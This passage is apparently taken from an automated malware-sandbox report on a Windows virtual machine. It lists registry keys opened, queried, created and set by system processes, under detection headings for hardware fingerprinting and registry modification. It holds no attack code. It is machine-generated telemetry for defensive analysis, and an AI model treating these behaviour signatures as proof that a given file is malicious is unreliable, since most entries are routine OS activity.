| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\System32\mousocoreworker.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={56F93C62-742F-41DC-B6BD-FDD623ECFEA1}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | C:\Windows\system32\svchost.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\7a-42-9e-e0-ea-a2\WpadDecisionReason = "1" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\7a-42-9e-e0-ea-a2\WpadDecision = "0" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\7a-42-9e-e0-ea-a2\WpadDecisionTime = 38c7fe8f3dc9db01 | C:\Windows\system32\svchost.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000c942547b3dc9db01f074287c3dc9db01f074287c3dc9db01903709000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45aa2212000646337613534306335313065353166313566316535323334343437396130396234326161353837623165613032646665653839623037616239373865316631650000b20009000400efbeb45aa221b45aa2212e000000000000000000000000000000000000000000000000006de79300640063003700610035003400300063003500310030006500350031006600310035006600310065003500320033003400340034003700390061003000390062003400320061006100350038003700620031006500610030003200640066006500650038003900620030003700610062003900370038006500310066003100650000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000000010f0391000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64633761353430633531306535316631356631653532333434343739613039623432616135383762316561303264666565383962303761623937386531663165000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007862626872707a6f000000000000000020b5dd590422d84082839ad7ed2fcdb1ef2f2bb46927f011b50f6aa57399dcbe20b5dd590422d84082839ad7ed2fcdb1ef2f2bb46927f011b50f6aa57399dcbece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003300340033003900330036003500330033002d0031003200360032003600330034003900370038002d0031003800360033003800370032003800310032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000a2211436000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\68b21ce8-3668-4554- = d216597c3dc9db01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e64b0ab3-e314-493b- = 947fe37b3dc9db01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e64b0ab3-e314-493b- = "\\\\?\\Volume{361421A2-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\156b72c5e65c061eb4663b015eec1f0fada4bdcb27c7635cfb0b5a948bf4cd48" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\92f697d5-1786-4ea2- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\68b21ce8-3668-4554- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\68b21ce8-3668-4554- = "\\\\?\\Volume{361421A2-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\58318078e6a30ee7ec4597ee1fb7a40bfa94836468c204e06ef9029ba038d7e0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\68b21ce8-3668-4554- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000002c1c4d7b3dc9db01cb72477c3dc9db01cb72477c3dc9db011ade07000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45aa2212000353833313830373865366133306565376563343539376565316662376134306266613934383336343638633230346530366566393032396261303338643765300000b20009000400efbeb45aa221b45aa2212e0000000000000000000000000000000000000000000000000039378300350038003300310038003000370038006500360061003300300065006500370065006300340035003900370065006500310066006200370061003400300062006600610039003400380033003600340036003800630032003000340065003000360065006600390030003200390062006100300033003800640037006500300000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000000010f0391000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c35383331383037386536613330656537656334353937656531666237613430626661393438333634363863323034653036656639303239626130333864376530000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007862626872707a6f000000000000000020b5dd590422d84082839ad7ed2fcdb1f02f2bb46927f011b50f6aa57399dcbe20b5dd590422d84082839ad7ed2fcdb1f02f2bb46927f011b50f6aa57399dcbece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003300340033003900330036003500330033002d0031003200360032003600330034003900370038002d0031003800360033003800370032003800310032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000a2211436000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b5878b52-19ce-4791- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d19a1226-0174-486e- = f541f07a3dc9db01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7bda18bd-8e1b-49b3- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7bda18bd-8e1b-49b3- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cf51f3bd-3a04-461f- = 97c2fa7a3dc9db01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
